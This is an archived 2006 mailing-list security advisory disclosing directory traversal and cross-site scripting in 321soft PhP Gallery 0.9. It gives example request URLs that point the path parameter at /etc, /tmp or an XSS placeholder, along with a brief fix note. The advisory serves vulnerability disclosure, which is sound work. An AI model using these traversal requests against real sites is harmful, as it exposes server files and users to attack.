|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
321soft PhP Gallery 0.9 - directory travel & XSS
d4igoro
gmail.com
Date: Tue May 02 2006 - 18:41:03 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle
credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp
http://[target]/index.php?path=[XSS]
solution:
----------------------------
index.php
fix $path
notes:
----------------------------
The vendor has been informed.
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]